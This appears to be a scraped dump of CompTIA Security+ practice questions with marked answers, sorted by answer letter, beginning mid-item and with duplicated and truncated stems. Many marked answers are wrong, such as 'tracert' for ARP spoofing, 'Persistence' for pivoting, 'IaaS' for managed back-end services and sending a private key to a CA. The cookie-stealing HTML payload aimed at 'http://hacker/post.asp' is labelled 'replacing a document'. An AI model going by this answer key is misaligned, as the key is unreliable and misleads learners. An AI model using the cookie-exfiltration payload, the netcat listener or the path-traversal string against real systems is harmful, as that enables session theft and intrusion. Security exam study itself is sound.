C. Multiple forms of protection is preferred over single points of failure.

A security administrator is trying to eradicate a worm, which is spreading throughout the organization, using an old remote vulnerability in the SMB protocol. The worm uses Nmap to identify target hosts within the company. The administrator wants to implement a solution that will eradicate the current worm and any future attacks that may be using zero-day vulnerabilities. Which of the following would BEST meet the requirements when implemented? A. Host-based firewall B. Enterprise patch management system C. Network-based intrusion prevention system D. Application blacklisting E. File integrity checking

C. Network-based intrusion prevention system

Attackers have been using revoked certificates for MITM attacks to steal credentials from employees of Company.com. Which of the following options should Company.com implement to mitigate these attacks? A. Captive portal B. Extended validation certificate C. OCSP stapling D. Object identifiers E. Key escrow

C. OCSP stapling

A department head at a university resigned on the first day of spring semester. It was subsequently determined that the department head deleted numerous files and directories from the server-based home directory while the campus was closed. Which of the following policies or procedures could have prevented this form occurring? A. Time-of-day restrictions B. Permissions auditing and review C. Offboarding D. Account expiration

C. Offboarding

An in-house penetration tester has been asked to evade a new DLP system. The tester plans to exfiltrate data through steganography. Discovery of which of the following would help catch the tester in the act? A. Abnormally high numbers of outgoing instant messages that contain obfuscated text B. Large-capacity USB drives on the tester's desk with encrypted zip files C. Outgoing emails containing unusually large image files D. Unusual SFTP connections to a consumer IP address

C. Outgoing emails containing unusually large image files

After a recent security breach at a hospital, it was discovered that nursing staff members, who were working the overnight shift, searched for and accessed private health information for local celebrities who were patients at the hospital. Which of the following would have enabled the hospital to discover this behavior BEFORE a breach occurred? A. Time-of-day restrictions B. Usage reviews C. Periodic permission audits D. Location-based policy enforcement

C. Periodic permission audits

Which of the following describes the maximum amount of time a mission essential function can operate without the systems it depends on before significantly impacting the organizaion? A. MTBF B. MTTR C. RTO D. RPO

C. RTO

Which of the following uses precomputed hashes to guess passwords? A. Iptables B. NAT tables C. Rainbow tables D. ARP tables

C. Rainbow tables

Which of the following BEST describes an important security advantage yielded by implementing vendor diversity? A. Sustainability B. Homogeneity C. Resiliency D. Configurability

C. Resiliency

A company is deploying smartphones for its mobile salesforce. These devices are for personal and business use but are owned by the company. Sales personnel will save new customer data via a custom application developed for the company. This application will integrate with the contact information stored in the smartphones and will populate new customer records onto it. The customer application's data is encrypted at rest, and the application's connection to the back office system is considered secure. The Chief Information Security Officer (CISO) has concerns that customer contact information may be accidentally leaked due to the limited security capabilities of the devices and the planned controls. Which of the following will be the MOST efficient security control to implement to lower this risk? A. Implement a mobile data loss agent on the devices to prevent any user manipulation with the contact information. B. Restrict screen capture features on the devices when using the custom application and the contact information. C. Restrict contact information storage data flow so it is only shared with the customer application. D. Require complex passwords for authentication when accessing the contact information.

C. Restrict contact information storage data flow so it is only shared with the customer application.

A security administrator installed a new network scanner that identifies new host systems on the network. Which of the following did the security administrator install? A. Vulnerability scanner B. Network-based IDS C. Rogue system detection D. Configuration compliance scanner

C. Rogue system detection

Confidential emails from an organization were posted to a website without the organization's knowledge. Upon investigation, it was determined that the emails were obtained from an internal actor who sniffed the emails in plain text. Which of the following protocols, if properly implemented, would have MOST likely prevented the emails from being sniffed? (Select TWO) A. Secure IMAP B. DNSSEC C. S/MIME D. SMTPS E. HTTPS

C. S/MIME D. SMTPS

A company has recently audited by a third party. The audit revealed the company's network devices were transferring files in the clear. Which of the following protocols should the company use to transfer files? A. HTTPS B. LDAPS C. SCP D. SNMPv3

C. SCP

A company was recently audited by a third party. The audit revealed the company's network devices were transferring files in the clear. Which of the following protocols should the company use to transfer files? A. HTTPS B. LDAPS C. SCP D. SNMPv3

C. SCP

The POODLE attack is a MITM exploit that affects: A. TLS1.0 with CBC mode cipher B. SSLv2.0 with CBC mode cipher C. SSLv3.0 with CBC mode cipher D. SSLv3.0 with ECB mode cipher

C. SSLv3.0 with CBC mode cipher

The POODLE attack is an MITM exploit that affects: A. TLS1.0 with CBC mode cipher B. SSLv2.0 with CBC mode cipher C. SSLv3.0 with CBC mode cipher D. SSLv3.0 with ECB mode cipher

C. SSLv3.0 with CBC mode cipher

When using a cryptographic function to store a password, which of the following should be used to avoid similar output from similar passwords? A. Hashing B. Field padding C. Salting D. Key rotating

C. Salting

An energy company is in the final phase of testing its new billing service. The testing team wants to use production data in the test system for stress testing. Which of the following is the BEST way to use production data without sending false notification to the customers? A. Back up and archive the production data to an external source. B. Disable notifications in the production system. C. Scrub the confidential information. D. Encrypt the data prior to the stress test.

C. Scrub the confidential information.

A security analyst is conducting a web application vulnerability scan against the company website. Which of the following is considered an intrusive scan? A. Ping sweep B. Time-delay port scanning C. Service identification D. Cipher suite order

C. Service identification

Joe, a user, wants to send a document electronically to Ann, another user, and ensure non-repudiation, confidentiality, and Integrity. Which of the following should Joe do? (Select TWO). A. Encrypt the document with Ann's private key. B. Encrypt the document with Joe's public key. C. Sign the document with Joe's private key. D. Sign the document with Ann's private key. E. Sign the document with Joe's public key. F. Encrypt the document with Ann's public key.

C. Sign the document with Joe's private key. F. Encrypt the document with Ann's public key.

Users in a corporation currently authenticate with a username and password. A security administrator wishes to implement two-factor authentication to improve security. Which of the following authentication methods should be deployed to achieve this goal? A. PIN B. Security question C. Smart card D. Passphrase E. CAPTCHA

C. Smart card

Which of the following types of embedded systems is required in manufacturing environments with life safety requirements? A. MFD B. RTOS C. SoC D. RTU

C. SoC Due to the importance and increasing complexity of electric control applicaiotns, the demands on real time (RT) platforms for such systems increase every year, which motivates moving these applications onto high performance system on chip (SoC).

Which of the following authentication concepts is a gait analysis MOST closely associated? A. Somewhere you are B. Something you are C. Something you do D. Something you know

C. Something you do

Which of the following would be considered multifactor authentication? A. Hardware token and smart card B. Voice recognition and retina scan C. Strong password and fingerprint D. PIN and security questions

C. Strong password and fingerprint

they are installed on is in danger of running out of computer resources. Which of the following vulnerabilities exist? A. Buffer overflow B. End-of-life systems C. System sprawl D. Weak configuration

C. System sprawl

Systems administrator and key support staff come together to simulate a hypothetical interruption of service. The team updates the disaster recovery processes and documentation after meeting. Which of the following describes the team's efforts? A. Business impact analysis B. Continuity of operation C. Tabletop exercise D. Order of restoration

C. Tabletop exercise

A security auditor is testing perimeter security in a building that is protected by badge readers. Which of the following types of attacks would MOST likely gain access? A. Phishing B. Man-in-the-middle C. Tailgating D. Watering hole E. Shoulder surfing

C. Tailgating

An attacker exploited a vulnerability on a mail server using the code below. <HTML><body onload=document.location.replace ('http://hacker/post.asp?victim&message =" + document.cookie + "<br>" + "URL:" +"document.location) ; /> </body> </HTML> Which of the following BEST explains what the attacker is doing? A. The attacker is replacing a cookie. B. The attacker is stealing a document. C. The attacker is replacing a document. D. The attacker is deleting a cookie.

C. The attacker is replacing a document.

Users are able to reach the login page of their company website from home using HTTP. A network administrator disables HTTP and implements SSL. However, after the implementation, home users cannot access the login page of the company website. Which of the following is the MOST likely reason the site is unavailable? A. The user's browsers are not equipped for SSL B. The company website implements HTTP redirects C. The company firewall is blocking port 443 traffic D. The company web server is using an expired certificate

C. The company firewall is blocking port 443 traffic

A DFIR analyst is collecting log data from multiple global locations. Which of the following must the DFIR analyst do to properly utilize the logs for forensic analysis? A. Log encryption B. Filing out chain of custody C. Time normalization D. Timesheet update

C. Time normalization

The help desk received a call after hours from an employee who was attempting to log into the payroll server remotely. When the help desk returned the call the next morning, the employee was able to log into the server remotely without incident. However, the incident occurred again the next evening. Which of the following BEST describes the cause of the issue? A. The password expired on the account and needed to be reset B. The employee does not have the rights needed to access the database remotely C. Time-of-day restrictions prevented the account from logging in D. The employee's account was locked out and needed to be unlocked

C. Time-of-day restrictions prevented the account from logging in

Which of the following s the BEST reason to run an untested application is a sandbox? A. To allow the application to take full advantage of the host system's resources and storage B. To utilize the host systems antivirus and firewall applications instead of running it own protection C. To prevent the application from acquiring escalated privileges and accessing its host system D. To increase application processing speed so the host system can perform real-time logging

C. To prevent the application from acquiring escalated privileges and accessing its host system

Management wishes to add another authentication factor in addition to fingerprints and passwords in order to have three-factor authentication. Which of the following would BEST satisfy this request? A. Retinal scan B. Passphrase C. Token fob D. Security question

C. Token fob

An employee in the finance department receives an email, which appears to come from the Chief Financial Officer (CFO), instructing the employee to immediately wire a large sum of money to a vendor. Which of the following BEST describes the principles of social engineering used? (Select TWO) A. Familiarity B. Scarcity C. Urgency D. Authority E. Consensus

C. Urgency D. Authority

A systems administrator is attempting to recover from a catastrophic failure in the datacenter. To recover the domain controller, the systems administrator needs to provide the domain administrator credentials. Which of the following account types is the systems administrator using? A. Guest account B. Service account C. User account D. Local Account

C. User account

Which of the following describes the key difference between vishing and phishing attacks? A. Phishing is used by attackers to steal a person's identity. B. Vishing attacks require some knowledge of the target of attack. C. Vishing attacks are accomplished using telephony services. D. Phishing is a category of social engineering attack.

C. Vishing attacks are accomplished using telephony services.

A company wishes to deploy a wireless network. Management insists that each individual user should have to authenticate with a unique username and password before being able to associate with the wireless access points. Which of the following wireless features would be the MOST appropriate to achieve this objective? A. WPA2 PSK B. WEP C. WPA Enterprise D. 802.11r E. Captive portal

C. WPA Enterprise

documented before it stopped functioning. The equipment connecting to the wireless network uses older legacy equipment that was manufactured prior to the release of the 802.11i standard. Which of the following configuration options should the administrator select for the new wireless router? A. WPA+CCMP B. WPA2+CCMP C. WPA+TKIP D. WPA2+TKIP

C. WPA+TKIP

A Chief Executive Officer (CEO) of an organization receives an email stating the CEO's account may have been compromised. The email further directs the CEO to click on a link to update the account credentials. Which of the following types of attacks has MOST likely occurred? A. Pharming B. Hoax C. Whaling D. Spear phishing

C. Whaling

Which of the following methods is used by internal security of internally developed applications? A. Active reconnaissance B. Pivoting C. White box testing D. Persistence

C. White box testing

The network team has detected a large amount of traffic between workstations on the network. The traffic was initially very light, but it is increasing exponentially as the day progresses. Which of the following types of malware might be suspected? A. Backdoor B. Rootkit C. Worm D. Spyware

C. Worm

Which of the following attack types BEST describes a client-side attack that is used to manipulate an HTML iframe with JavaScript code via a web browser? A. Buffer overflow B. MITM C. XSS D. SQLi

C. XSS

An active/passive configuration has an impact on: A. confidentiality B. integrity C. availability D. non-repudiation

C. availability

A cybersecurity analyst is looking into the payload of a random packet capture file that was selected for analysis. The analyst notices that an internal host had a socket established with another internal host over a non-standard port. Upon investigation, the origin host that initiated the socket shows this output: usera@host>history mkdir /local/usr/bin/somedirectory nc -1 192.168.5.1 -p 9856 ping -c 30 8.8.8.8 -a 600 rm /etc/dir2/somefile rm -rm /etc/dir2/ traceroute 8.8.8.8 pakill pid 9487 usera@host> Given the above output, which of the following commands would have established the questionable socket? A. traceroute 8.8.8.8 B. ping -1 30 8.8.8.8 -a 600 C. nc -1 192.168.5.1 -p 9856 D. pskill pid 9487

C. nc -1 192.168.5.1 -p 9856

A procedure differs from a policy in that it: A. is a high-level statement regarding the company's position on a topic. B. sets a minimum expected baseline of behavior. C. provides step-by-step instructions for performing a task. D. describes adverse actions when violations occur.

C. provides step-by-step instructions for performing a task.

A security architect has convened a meeting to discuss an organization's key management policy. The organization has a reliable internal key management system, and some argue that it would be best to manage the cryptographic keys internally as opposed to using a solution from a third party. The company should use: A. the current internal key management system. B. a third-party key management system that will reduce operating costs. C. risk benefits analysis results to make a determination. D. a software solution including secure key escrow capabilities.

C. risk benefits analysis results to make a determination.

Finance department employees are reporting slow network connectivity and SSL/TLS certificate errors when they access secure websites. A security administrator suspects a computer in the finance VLAN may have been compromised and is impersonating the router's IP address using an MITM attack. Which of the following commands should the security administrator use to verify this finding? A. arp B. route C. tracert D. nmap E. nslookup

C. tracert

A penetration tester is conducting an assessment on Comptia.org and runs the following command from a coffee shop while connected to the public Internet: c:\nslookup -querytype=MX comptia.org Server: Unknown Address: 198.51.100.45 comptia.org MX preference=10, mail exchanger = 92.68.102.33 comptia.org MX preference=20, mail exchanger = exchg1.comptia.org exchg1.comptia.org internet address = 192.168.102.67 Which of the following should the penetration tester conclude about the command output? A. The public/private views on the Comptia.org DNS servers are misconfigured. B. Comptia.org is running an older mail server, which may be vulnerable to exploits. C. The DNS SPF records have not been updated for Comptia.org. D. 192.168.102.67 is a backup mail server that may be more vulnerable to attack.

D. 192.168.102.67 is a backup mail server that may be more vulnerable to attack.

A Chief Information Officer (CIO) has decided it is not cost effective to implement safeguards against a known vulnerability. Which of the following risk responses does this BEST describe? A. Transference B. Avoidance C. Mitigation D. Acceptance

D. Acceptance

A new system design will include local user tables and password files managed by the systems administrators, an external permissions tree managed by an access control team, and an external auditing infrastructure managed by a security team. Which of the following is managed by the security team? A. Identification B. Authorization C. Authentication D. Accounting

D. Accounting

A new Chief Information Officer (CIO) has been reviewing the badging and decides to write a policy that all employees must have their badges rekeyed at least annually. Which of the following controls BEST describes this policy? A. Physical B. Corrective C. Technical D. Administrative

D. Administrative

A technician is investigating a potentially compromised device with the following symptoms: Browser slowness Frequent browser crashes Hourglass stuck New search toolbar Increased memory consumption Which of the following types of malware has infected the system? A. Man-in-the-browser B. Spoofer C. Spyware D. Adware

D. Adware

A security administrator wants to prevent standard users from running software they downloaded or copied to the computer. The security administrator find the following permissions on the computer: Folder Location Administrator Permissions Standard User Permissions C:\ RW RW C:\OperatingSystem\ RW R C:\Programs\ RW R C:\TEMP\ RW RW C:\ShippingDATA RW RW C:\Users\User1 R RW C:\Users\Admin RW . The administrator needs to create a policy that specifies from which folders a low-privilege user can run applications. Which of the following application whitelist configurations would BEST accomplish this task? A. Allow: * Block: C:\TEMP, C:\Shipping DATA, C:\Users\User1 B. Allow: C:\, C:\OperatingSystem, C:\Programs, C:\Users\User1 Block: C:\TEMP, C:\ShippingDATA, C:\Users\User1 C. Allow: C:\ Block: C:\TEMP, C:\ShippingDATA, C:\Users\User1 D. Allow: C:\OperatingSystem\, C: Programs Block: *

D. Allow: C:\OperatingSystem\, C: Programs Block: *

Which of the following BEST describes the impact of an unremediated session timeout vulnerability? A. The credentials of a legitimate user could be intercepted and reused to log in when the legitimate user is offline. B. An attacker has more time to attempt brute-force password cracking. C. More than one user may be allowed to concurrently connect to the system, and an attacker can use one of those concurrent connections. D. An attacker could use an existing session that has been initiated by a legitimate user.

D. An attacker could use an existing session that has been initiated by a legitimate user.

The computer resource center issue smartphones to all first-level and above managers. The managers have the ability to install mobile tools. Which of the following tools should be implemented with the type of tools the managers installed? A. Download manager B. Content manager C. Segmentation manager D. Application manager

D. Application manager

is concerned that an unrecognized threat could compromise corporate data and result in regulatory fines as well as poor corporate publicity. The network is mostly flat, with split staff/guest wireless functionality. Which of the following equipment MUST be deployed to guard against unknown threats? A. Cloud-based antivirus solution, running as local admin, with push technology for definition updates B. Implementation of an off-site datacenter hosting all company data, as well as deployment of VDI for all client computing needs C. Host-based heuristic IPS, segregated on a management VLAN, with direct control of the perimeter firewall ACLs D. Behavior-based IPS with a communication link to a cloud-based vulnerability and threat feed

D. Behavior-based IPS with a communication link to a cloud-based vulnerability and threat feed

An administrator is configuring a wireless network. Security policy states that deprecated cryptography should not be used when there is an alternative choice. Which of the following should the administrator use for the wireless network's cryptographic protocol? A. MD5 B. RC4 C. TKIP D. CCMP E. Diffie-Hellman

D. CCMP

Which of the following locations contain the MOST volatile data? A. SSD B. Paging file C. RAM D. Cache memory

D. Cache memory

A security engineer must install the same x.509 certificate on three different servers. The client application that connects to the server performs a check to ensure the certificate matches the host name. Which of the following should the security engineer use? A. Wildcard certificate B. Extended validation certificate C. Certificate chaining D. Certificate utilizing the SAN file

D. Certificate utilizing the SAN file

A stock trading company had the budget for enhancing its secondary datacenter approved. Since the main site is a hurricane-affected area and the disaster recovery site is 100 mi (161 km) away, the company wants to ensure its business is always operational with the least amount of man hours needed. Which of the following types of disaster recovery sites should the company implement? A. Hot site B. Warm site C. Cold site D. Cloud-based site

D. Cloud-based site

Which of he following computer recovery sites is the least expensive and the most difficult to test at the same time? A. Non-mobile hot site B. Mobile hot site C. Warm site D. Cold site

D. Cold site

A security analyst is hardening a WiFi infrastructure. The primary requirements are the following: The infrastructure must allow staff to authenticate using the most secure method. The infrastructure must allow guests to use an "open" WiFi network that logs valid email addresses before granting access to the Internet. Given these requirements, which of the following statements BEST represents what the analyst should recommend and configure? A. Configure a captive portal for guests and WPS for staff. B. Configure a captive portal for staff and WPA for guests. C. Configure a captive portal for staff and WEP for guests. D. Configure a captive portal for guest and WPA2 Enterprise for staff.

D. Configure a captive portal for guest and WPA2 Enterprise for staff.

A member of the IR team has identified an infected computer. Which of the following IR phases should the team member conduct NEXT? A. Eradication B. Recovery C. Lessons learned D. Containment

D. Containment

A security analyst is attempting to solve compatibility issues between the company's ERP software and application whitelisting controls. The organizations uses application whitelisting to ensure only tested and approved applications are able to run within the organization. In the current configuration, only executables installed in C:\program files\ are able to be executed by the user. The following information is logged by the ERP software ERP Corp Application v1.2 Date: 1/22/2017 5:00 AM Running scheduled task processdata1\ copying file C:\program files\ERPCorp\processdata.exe to C:\temp\processdata-1-22-2017-0500.exe Error: could not execute C:\temp\processdata-1-22-2017-0500.exe - Access Denied Fault in application 0x00f4bc01 - Shutting Down Which of the following would BEST resolve the issue without allowing for any potentially untested or unapproved software to be executed? A. Create a path rule that permits C:\temp\processdata-1-22-2017-0500.exe to be executed. B. Create a hash rule that permits the application processdata.exe to be executed. C. Create a path rule that permits C:\temp\*.exe to be executed. D. Create a rule that allows all software digitally signed by ERP Corp. to be executed. E. Contact the software's publisher and request a patch be made to change the behavior of the software.

D. Create a rule that allows all software digitally signed by ERP Corp. to be executed.

A security analyst wants to limit the use of USB and external drives to protect against malware, as well as protect files leaving a user's computer. Which of the following is the BEST method to use? A. Firewall B. Router C. Antivurs software D. Data loss prevention

D. Data loss prevention

An organization has an account management policy that defines parameters around each type of account. The policy specifies different security attributes, such as longevity, usage auditing, password complexity, and identity proofing. The goal of the account management policy is to ensure the highest level of security while providing the greatest availability without compromising data integrity for users. Which of the following account types should the policy specify for service technicians from corporate partners? A. Guest account B. User account C. Shared account D. Privileged user account E. Default account F. Service account

D. Default account

A home invasion occurred recently in which an intruder compromised a home network and accessed a WiFIenabled baby monitor while the baby's parents were sleeping. Which of the following BEST describes how the intruder accessed the monitor? A. Outdated antivirus B. WiFi signal strength C. Social engineering D. Default configuration

D. Default configuration

The Chief Information Officer (CIO) asks an employee to remove confidential data stored on end-of-life company laptops prior to recycling them. Which of the following is the BEST way to accomplish this? A. Right-click and delete the folders on the hard drives. B. Reinstall the OSs. C. Perform a quick format of the hard drives. D. Degauss the hard drives.

D. Degauss the hard drives.

A systems administrator is deploying a new mission essential server into a virtual environment. Which of the following is BEST mitigated by the environment's rapid elasticity characteristic? A. Data confidentiality breaches B. VM escape attacks C. Lack of redundancy D. Denial of service

D. Denial of service

A security engineer is configuring a wireless network with EAP-TLS. Which of the following activities is a requirement for this configuration? A. Setting up a server B. Configuring federation between authentication servers C. Enabling TOTP D. Deploying certificates to endpoint devices

D. Deploying certificates to endpoint devices

A group of developers is collaborating to write software for a company. The developers need to work in subgroups and restrict access to their modules. Which of the following access control methods is considered user-centric? A. Role-based B. Mandatory C. Rule-based D. Discretionary

D. Discretionary

A security engineer is configuring a wireless network. The security requirements for the network are: Mutual authentication of wireless clients and the authentication server Client authentication must be username and password Cannot use a certificate on the authentication server Which of the following protocols BEST meets these requirements? A. EAP B. EAP-TLS C. EAP-TTLS D. EAP-FAST

D. EAP-FAST

A business sector is highly competitive, and safeguarding trade secrets and critical information is paramount. On a seasonal basis, an organization employs temporary hires and contractor personnel to accomplish its mission objectives. The temporary and contract personnel require access to network resources only when on the clock. Which of the following account management practices are the BEST ways to manage these accounts? A. Employ time-of-day restrictions. B. Employ password complexity. C. Employ a random key generator strategy. D. Employ an account expiration strategy. E. Employ a password lockout policy.

D. Employ an account expiration strategy.

An organization recently moved its custom web applications to the cloud, and it is obtaining managed services of the back-end environment as part of its subscription. Which of the following types of services is this company now using? A. Saas B. CASB C. IaaS D. Paas

D. IaaS

An incident response manager has started to gather all the facts related to a SIEM alert showing multiple systems may have been compromised. The manager has gathered these facts: The breach is currently indicated on six user PCs One service account is potentially compromised Executive management has been notified In which of the following phases of the IRP is the manager currently working? A. Recovery B. Eradication C. Containment D. Identification

D. Identification

A company is performing an analysis of the corporate enterprise network with the intent of identifying what will cause losses in revenue, referrals, and/or reputation when out of commission. Which of the following is an element of a BIA that is being addressed? A. Mission-essential function B. Single point of failure C. backup and restoration plans D. Identification of critical systems

D. Identification of critical systems

An audit takes place after company-wide restructuring, in which several employees changed roles. The following deficiencies are found during the audit regarding access to confidential data. Employee Job Function Audit Finding Ann Sales Manager *Access to confidential payroll shares *Access to payroll processing program *Access to marketing shares Jeff Marketing Director *Access to human resources annual review folder *Access to shared human resources mailbox John Sales Manager *Active account *Access to human resources annual review folder *Access to confidential payroll shares Which of the following would be the BEST method to prevent similar audit finding in the future? A. Implement separation of duties for the payroll department B. Implement a DLP solution on the payroll and human resources reviews C. Implement rule-based access controls on the human resources server D. Implement regular permission auditing and reviews

D. Implement regular permission auditing and reviews

Several workstations on a network are found to be on OS versions that are vulnerable to a specific attack. Which of the following is considered to be a corrective action to combat this vulnerability? A. Install an antivirus definition patch B. Educate the workstation users C. Leverage server isolation D. Install a vendor-supplied patch E. Install an intrusion detection system

D. Install a vendor-supplied patch

A security analyst receives an alert from a WAF with the following payload: var data = "<test test test> ++ <../../../../../../etc/passwd>" Which of the following types of attacks is this? A. Cross-site request forgery B. Buffer overflow C. SQL injection D. JavaScript data insertion E. Firewall evasion script

D. JavaScript data insertion

Ann, a user, states that her machine has been behaving erratically over the past week. She has experienced slowness and input lag and found text files that appear to contain pieces of her emails or online conversations with coworkers. The technician runs a standard virus scan but detects nothing. Which of the following types of malware has infected the machine? A. Ransomware B. Rootkit C. Backdoor D. Keylogger

D. Keylogger

A technician is configuring a load balancer for the application team to accelerate the network performance of their applications. The applications are hosted on multiple servers and must be redundant. Given this scenario, which of the following would be the BEST method of configuring the load balancer? A. Round-robin B. Weighted C. Least connection D. Locality-based

D. Locality-based

A security analyst launches the Task Manager on a server with poor performance, and notices private bytes are being exhausted is constantly recycling. Which of the following BEST describes the cause of the negative impact to application availability? A. Integer overlow B. Buffer overflow C. Race condition D. Memory leak

D. Memory leak

A penetration tester has written an application that performs a bit-by-bit XOR 0xFF operation on binaries prior to transmission over untrusted media. Which of the following BEST describes the action performed by this type of application? A. Hashing B. Key exchange C. Encryption D. Obfusication

D. Obfusication

A company is implementing an internal PKI. The design will include a CA and a subordinate CA. Which of the following CA design choices should be considered prior to implementation? A. Wildcard vs. standard certificate B. Subject filed vs. subject alternative name field C. Private vs. public D. Online vs. offline E. Stapling vs. pinning

D. Online vs. offline

Ann is the IS manager for several new systems in which the classifications of the systems' data are being decided. She is trying to determine the sensitivity level of the data being processed. Which of the following people should she consult to determine the data classification? A. Steward B. Custodian C. User D. Owner

D. Owner

decided. She is trying to determine the sensitivity level of the data being processed. Which of the following people should she consult to determine the data classification? A. Steward B. Custodian C. User D. Owner

D. Owner

An office manager found a folder that included documents with various types of data relating to corporate clients. The office manager notified the data included dates of birth, addresses, and phone numbers for the clients. The office manager then reported this finding to the security compliance officer. Which of the following portions of the policy would the security officer need to consult to determine if a breach has occurred? A. Public B. Private C. PHI D. PII

D. PII

Which of the following would provide additional security by adding another factor to a smart card? A. Token B. Proximity badge C. Physical key D. PIN

D. PIN

A penetration tester uses an exploited network printer as a base of operations to expand access to various workstations. Which of the following BEST describes the tester's actions? A. Pivoting B. Passive reconnaissance C. Active reconnaissance D. Persistence

D. Persistence

A web server, which is configured to use TLS with AES-GCM-256, SHA-384, and ECDSA, recently suffered an information loss breach. Which of the following is MOST likely the cause? A. Insufficient key bit length B. Weak cipher suite C. Unauthenticated encryption method D. Poor implementation

D. Poor implementation

A systems administrator wants to generate a self-signed certificate for an internal website. Which of the following steps should the systems administrator complete prior to installing the certificate on the server? A. Provide the private key to a public CA. B. Provide the public key to the internal CA. C. Provide the public key to a public CA. D. Provide the private key to the internal CA. E. Provide the public/private key pair to the internal CA. F. Provide the public/private key pair to a public CA.

D. Provide the private key to the internal CA.

A systems administrator wants to implement a wireless protocol that will allow the organization to authenticate mobile devices prior to providing the user with a captive portal login. Which of the following should the systems administrator configure? A. L2TP with MAC filtering B. EAP-TTLS C. WPA2-CCMP with PSK D. RADIUS federation

D. RADIUS federation

A security analyst is investigating a potential reach. Upon gathering, documenting, and securing the evidence, which of the following actions is the NEXT step to minimize the business impact? A. Launch an investigation to identify the attacking host B. Initiate the incident response plan C. Review lessons learned captured in the process D. Remove malware and restore the system to normal operation

D. Remove malware and restore the system to normal operation

An external auditor visits the human resources department and performs a physical security assessment. The auditor observed documents on printers that are unclaimed. A closer look at these documents reveals employee names, addresses, ages, and types of medical and dental coverage options each employee has selected. Which of the following is the MOST appropriate actions to take? A. Flip the documents face down so no one knows these documents are PII sensitive B. Shred the documents and let the owner print the new set C. Retrieve the documents, label them with a PII cover sheet, and return them to the printer D. Report to the human resources manager that their personnel are violating a privacy policy

D. Report to the human resources manager that their personnel are violating a privacy policy

A company is allowing a BYOD policy for its staff. Which of the following is a best practice that can decrease the risk of users jailbreaking mobile devices? A. Install a corporately monitored mobile antivirus on the devices. B. Prevent the installation of applications from a third-party application store. C. Build a custom ROM that can prevent jailbreaking. D. Require applications to be digitally signed.

D. Require applications to be digitally signed.

A security specialist is notified about a certificate warning that users and seeing the warning, the security specialist inspects the certificate and realizes it has been issued to the IP address, which is how the developers reach the site. Which of the following would BEST resolve the issue? A. OSCP B. OID C. PEM D. SAN

D. SAN

A website form is used to register new students at a university. The form passed the unsanitized values entered by the user and uses them to directly add the student's information to several core systems. Which of the following attacks can be used to gain further access due to this practice? A. Cross-site request forgeries B. XSS attacks C. MITM attacks D. SQL injection

D. SQL injection

A security engineer wants to implement a site-to-site VPN that will require SSL certificates for mutual authentication. Which of the following should the engineer implement if the design requires client MAC addresses to be visible across the tunnel? A. Tunnel mode IPSec B. Transport mode VPN IPSec C. L2TP D. SSL VPN

D. SSL VPN

To help prevent one job role from having sufficient access to create, modify, and approve payroll data, which of the following practices should be employed? A. Least privilege B. Job rotation C. Background checks D. Separation of duties

D. Separation of duties

A systems administrator wants to provide for and enforce wireless access accountability during events where external speakers are invited to make presentations to a mixed audience of employees and non-employees. Which of the following should the administrator implement? A. Shared accounts B. Preshared passwords C. Least privilege D. Sponsored guest

D. Sponsored guest

A security administrator wants to install an AAA server to centralize the management of network devices, such as routers and switches. The server must reauthorize each individual command executed on a network device. Which of the following should be implemented? A. RADIUS B. Kerberos C. SAML D. TACACS+

D. TACACS+

Which of the following staging environments is MOST likely to be a one-to-one mapping with the production environment and used for testing and validation prior to "go live"? A. Quality assurance B. Development C. Production D. Test

D. Test

A security analyst is reviewing patches on servers. One of the servers is reporting the following error message in the WSUS management console: The computer has not reported status in 30 days. Given this scenario, which of the following statements BEST represents the issue with the output above? A. The computer in question has not pulled the latest ACL policies for the firewall. B. The computer in question has not pulled the latest GPO policies from the management server. C. The computer in question has not pulled the latest antivirus definitions from the antivirus program. D. The computer in question has not pulled the latest application software updates.

D. The computer in question has not pulled the latest application software updates.

The payroll department has contacted the security team regarding an anomaly with amounts paid via the weekly payroll file. The security analyst is provided the following log from the server. Time Source IP File Path Action 1/1/16 9:24:10 10.10.24.156 C:\ACH\payrolll.xls File created 1/1/16 3:15:23 172.14.89.12 C:\ACH\payrolll.xls File transferred 1/7/16 9:24:10 10.10.24.156 C:\ACH\payrolll.xls File created 1/7/16 3:15:23 172.14.89.12 C:\ACH\payrolll.xls File transferred 1/14/16 9:24:10 10.10.24.156 C:\ACH\payrolll.xls File created 1/14/16 9:51:34 10.10.24.156 C:\ACH\payrolll.xls File modified 1/14/16 3:10:29 172.14.89.12 C:\ACH\payrolll.xls Transfer failed 1/14/16 4:10:52 172.14.89.12 C:\ACH\payrolll.xls File transferred 1/21/16 9:24:10 10.10.24.156 C:\ACH\payrolll.xls File created 1/21/16 3:45:01 172.14.89.12 C:\ACH\payrolll.xls File transferred 1/28/16 9:24:10 10.10.24.156 C:\ACH\payrolll.xls File created 1/28/16 9:45:23 10.10.24.156 C:\ACH\payrolll.xls File modified 1/28/16 10:23:52 17.23.45.29 C:\ACH\payrolll.xls File modified 1/28/16 3:22:15 172.14.89.12 C:\ACH\payrolll.xls File transferred Which of the following is the MOST likely reason for the anomaly? A. The file was corrupted in transit. B. The file was transferred to the wrong destination. C. The connection was refused by the destination. D. The file was compromised before being sent.

D. The file was compromised before being sent.

A security engineer at a manufacturing company is implementing a third-party cloud application. Rather than create users manually in the application, the engineer decides to use the SAML protocol. Which of the following is being used for this implementation? A. The manufacturing company is the service provider, and the cloud company is the identity provider. B. The manufacturing company is the authorization provider, and the cloud company is the service provider. C. The manufacturing company is the identity provider, and the cloud company is the OAuth provider. D. The manufacturing company is the identity provider, and the cloud company is the service provider. E. The manufacturing company is the service provider, and the cloud company is the authorization provider.

D. The manufacturing company is the identity provider, and the cloud company is the service provider.

In determining when it may be necessary to perform a credentialed scan against a system instead of a noncredentialed scan, which of the following requirements is MOST likely to influence its decisions? A. The scanner must be able to enumerate the host OS of devices scanner B. The scanner must be able to footprint the network C. The scanner must be able to check for open ports with listening services D. The scanner must be able to audit file system permissions

D. The scanner must be able to audit file system permissions

A malicious system continuously sends an extremely large number of SYN packets to a server. Which of the following BEST describes the resulting effect? A. The server will be unable to server clients due to lack of bandwidth B. the server's firewall will be unable to effectively filter traffic due to the amount of data transmitted C. The server will crash when trying to reassemble all the fragmented packets D. The server will exhaust its memory maintaining half-open connections

D. The server will exhaust its memory maintaining half-open connections

A call center company wants to implement a domain policy primarily for its shift workers. The call center has large groups with different user roles. Management wants to monitor group performance. Which of the following is the BEST solution for the company to implement? A. Reduced failed logon attempts B. Mandatory password changes C. Increased account lockout time D. Time-of-day restriction

D. Time-of-day restrictions

